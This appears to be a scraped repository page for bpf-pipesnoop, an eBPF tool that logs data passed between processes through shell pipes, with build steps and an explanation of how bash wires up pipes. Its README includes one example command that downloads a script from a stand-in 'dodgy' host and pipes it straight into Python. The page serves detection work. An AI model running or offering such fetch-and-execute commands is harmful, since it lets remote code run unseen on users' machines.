Example program using eBPF to log data being based in using shell pipes

Related tags

Logging bpf-pipesnoop
Overview

BPF-PipeSnoop

Example program using eBPF to log data being based in using shell pipes (|)

Accompanies my blog Using eBPF to uncover in-memory loading

Overview

Shells can parse data between programs using pipes, e.g.:

curl https://dodgy.com/loader.py | python -

In this example, a python script is downloaded from the internet and executed, without the file being written to disk, and its content is not visible on the commnandline.

pipesnoop is a demonstration of how you could detect when data is being passed using pipes and log it, all using eBPF.

Building

# First clone the repository and the libbpf submodule
git clone --recursive https://github.com/pathtofile/bpf-pipesnoop.git
cd bpf-pipesnoop/src
make

This should generate the program pipesnoop in the same directory.

Running

Just run as root and watch the output:

sudo ./pipesnoop

How it works

(Note experts will have better descripion than this) When bash is given a command to run multiple programs with a pipe in between, a number of things happen. If the example is:

bash -c "apple | banana"

Then this will happen:

Bash pipe

bash will use the syscall pipe to create an annonamous pipe. This returns two file descriptors, 1 for each end of the pip, e.g. fds 3 and 4.

Bash clone

bash will call clone twice to create apple and banana. Both programs inhearet all of bash's fds, so they also has fds 3 and 4. important note this means both apple and banana start running at (almost) the same time, i.e. banana does not wait for apple to finish before running.

Apple close and dup2

apple will close one end of the pipe e.g. 3, then call dup2 to overwrite its stdout or 1 fd with the non-closed end of the pipe, e.g. dup2(4, 1).

Banana close and dup2

banana will close the other end of the pipe, e.g. 4, then call dup2 to overwrite its stdin or 0 fd with the non-closed end of the pipe, e.g. dup2(3, 0).

Apple write

apple will start writing data to stdout like normal, but due to the dup2 call it ends up instead into the pipe.

Banana read

banana will start reading data from its stdin like normal, but due to the dup2 call it ends up instead reading from the pipe.

Pipe close

When apple closes, it will send an 'end of stream' down the pipe, so banana knows it has finished reading.

Aknowledgements

The skeleton of this project was made with the help of Libpf-Bootstrap.

You might also like...
An Ultra Low Power temperature logger based on the ESP8266 MCU.
An Ultra Low Power temperature logger based on the ESP8266 MCU.

Temperature logging IoT node Overview: The real node wired on a breadboard This is an ultra low power (ULP) temperature logging IoT node based on the

Radhi SGHAIER 12 Nov 16, 2022
Building a basic logger from scratch using the C programming language.

Logger Building a basic logger from scratch using the C programming language. Compiling and Running the program: Using the gcc compiler: gcc example.c

Nicolas Gonzalez 1 May 14, 2022
Log.c2 is based on rxi/log.c with MIT LICENSE which is inactive now. Log.c has a very flexible and scalable architecture

log.c2 A simple logging library. Log.c2 is based on rxi/log.c with MIT LICENSE which is inactive now. Log.c has a very flexible and scalable architect

Alliswell 2 Feb 13, 2022
Mini-async-log-c - Mini async log C port. Now with C++ wrappers.

Description A C11/C++11 low-latency wait-free producer (when using Thread Local Storage) asynchronous textual data logger with type-safe strings. Base

null 69 Nov 9, 2022
Simple application log library. supporting multiple log levels, custom output & flash memory support.
Simple application log library. supporting multiple log levels, custom output & flash memory support.

ArduinoLog - C++ Log library for Arduino devices An minimalistic Logging framework for Arduino-compatible embedded systems. ArduinoLog is a minimalist

Thijs Elenbaas 132 Nov 12, 2022
simple c program thats spawns a shell wants executed, this shell will detect your os and upon entering will erase or reset the system V1.0

kill-shell simple c program thats spawns a shell wants executed, this shell will detect your os and upon entering will erase or reset the system V1.0

RE43P3R 1 Oct 18, 2021
Techniques based on named pipes for pool overflow exploitation targeting the most recent (and oldest) Windows versions

Table of Contents Table of Contents Introduction Named-Pipes Introduction Exploitation Spraying the non-paged pool Memory Disclosure/Arbitrary Read Co

null 141 Dec 16, 2022
Example how to run eBPF probes without a usermode process using fentry

Pinning eBPF Probes Simple example to demonstrate how to pin kernel function and syscall probes. Overview From my reading of the kernel code, KProbe a

pat_h/to/file 3 Jun 7, 2021
Tiny and cheap robot car for inspecting sewer pipes >= 125 mm. With pan servo for the ESP32-Cam module
Tiny and cheap robot car for inspecting sewer pipes = 125 mm. With pan servo for the ESP32-Cam module

ESP32-Cam Sewer inspection car Version 1.0.0 - work in progress Based on esp32-cam-webserver by Owen Carter. Additional Features Pan servo for the ESP

Armin 5 Nov 6, 2022
Client Server Simulation with FIFOs in C (Named Pipes)

Client-Server-Sim-in-C Client Server Simulation with FIFOs in C (Named Pipes) There are a number of ways to enable inter-process communication i.e Soc

Yusuf Ghodiwala 1 Nov 24, 2021
Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions
Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions

xPipe Cobalt Strike BOF (x64) Cobalt Strike Beacon Object File (BOF) to list active Pipes & return their Owner & Discretionary Access Control List (DA

Bobby Cooke 65 Nov 9, 2022
crypted admin shell: SSH-like strong crypto remote admin shell for Linux, BSD, Android, Solaris and OSX
crypted admin shell: SSH-like strong crypto remote admin shell for Linux, BSD, Android, Solaris and OSX

crypted admin shell: SSH-like strong crypto remote admin shell for Linux, BSD, Android, Solaris and OSX

Sebastian 135 Jan 2, 2023
Pine's ok shell, a shell in C++

POSH Pine's ok shell, a shell in C++ Answers to questions nobody asked. "Is your name Pine?" No, although that would be neat. Pine is supposed to be a

Boops-Boops 1 Nov 6, 2021
SimPle SHell - minimalist Unix interactive shell written in a single C file

SimPle SHell - minimalist Unix interactive shell written in a single C file. The shell does not support scripting yet and is in an early stage of development. If you notice any bug, please open an issue on github.

sewe2000 2 Oct 24, 2021
My_Shell is a user-defined interactive shell written in C that works similar to the original shell in linux

MY_SHELL Overview My_Shell is a user-defined interactive shell written in C that works similar to the original shell and it can execeute many of the l

Greeshma 1 Nov 22, 2021
Algo-Tree is a collection of Algorithms and data structures which are fundamentals to efficient code and good software design. Creating and designing excellent algorithms is required for being an exemplary programmer. It contains solutions in various languages such as C++, Python and Java.
Algo-Tree is a collection of Algorithms and data structures which are fundamentals to efficient code and good software design. Creating and designing excellent algorithms is required for being an exemplary programmer. It contains solutions in various languages such as C++, Python and Java.

Algo-Tree 🌲 Algo-Tree is a collection of Algorithms and data structures which are fundamentals to efficient code and good software design. Creating a

Algo Phantoms 321 Dec 2, 2022
Data Structures concepts being implemented to build the Game of Life

The Game of Life Data Structures concepts being implemented to build the Game of Life which is a cellular automation devised by the mathematician Jame

Aleezeh Usman 3 Sep 5, 2021
Is a linear data structure with O(log n) searches and O(cbrt n) insertions and index lookups.
Is a linear data structure with O(log n) searches and O(cbrt n) insertions and index lookups.

A binary cube is a linear data structure that contains a sorted two dimensional dynamic array of nodes which each point to a sorted array

null 22 Jul 13, 2022
RocketOS is a Unix based OS that uses legacy BIOS and GRUB and is written in C17. It is being developed for educational purposes primarily, but it still is a serious project. It is currently in its infancy.

RocketOS What is RocketOS? RocketOS is a Unix based OS that uses legacy BIOS and GRUB and is written in C17. It is being developed for educational pur

null 30 Sep 19, 2022
Owner
pat_h/to/file
[email protected]
pat_h/to/file
GitHub
Mini-async-log-c - Mini async log C port. Now with C++ wrappers.

Description A C11/C++11 low-latency wait-free producer (when using Thread Local Storage) asynchronous textual data logger with type-safe strings. Base

null 69 Nov 9, 2022
log4cplus is a simple to use C++ logging API providing thread-safe, flexible, and arbitrarily granular control over log management and configuration. It is modelled after the Java log4j API.

% log4cplus README Short Description log4cplus is a simple to use C++17 logging API providing thread--safe, flexible, and arbitrarily granular control

null 1.4k Jan 4, 2023
A revised version of NanoLog which writes human readable log file, and is easier to use.

NanoLogLite NanoLogLite is a revised version of NanoLog, and is easier to use without performance compromise. The major changes are: NanoLogLite write

Meng Rao 26 Nov 22, 2022
Log engine for c plus plus

PTCLogs library PTCLogs is a library for pretty and configurable logs. Installation To install the library (headers and .so file), clone this repo and

Pedro Tavares de Carvalho 12 May 20, 2022
Cute Log is a C++ Library that competes to be a unique logging tool.

Cute Log Cute Log is a C++ Library that competes to be a unique logging tool. Version: 2 Installation Click "Code" on the main repo page (This one.).

null 3 Oct 13, 2022
Compressed Log Processor (CLP) is a free tool capable of compressing text logs and searching the compressed logs without decompression.

CLP Compressed Log Processor (CLP) is a tool capable of losslessly compressing text logs and searching the compressed logs without decompression. To l

null 516 Dec 30, 2022
View and log aoe-api requests and responses

aoe4_socketspy View and log aoe-api requests and responses Part 1: https://www.codereversing.com/blog/archives/420 Part 2: https://www.codereversing.c

Alex Abramov 10 Nov 1, 2022
Sagan - a multi-threads, high performance log analysis engine

Sagan - Sagan is a multi-threads, high performance log analysis engine. At it's core, Sagan similar to Suricata/Snort but with logs rather than network packets.

Quadrant Information Security 80 Dec 22, 2022
A DC power monitor and data logger

Hoverboard Power Monitor I wanted to gain a better understanding of the power consumption of my hoverboard during different riding situations. For tha

Niklas Roy 22 May 1, 2021
A BSD-based OS project that aims to provide an experience like and some compatibility with macOS

What is Helium? Helium is a new open source OS project that aims to provide a similar experience and some compatibiilty with macOS on x86-64 sytems. I

Zoë Knox 4.7k Dec 30, 2022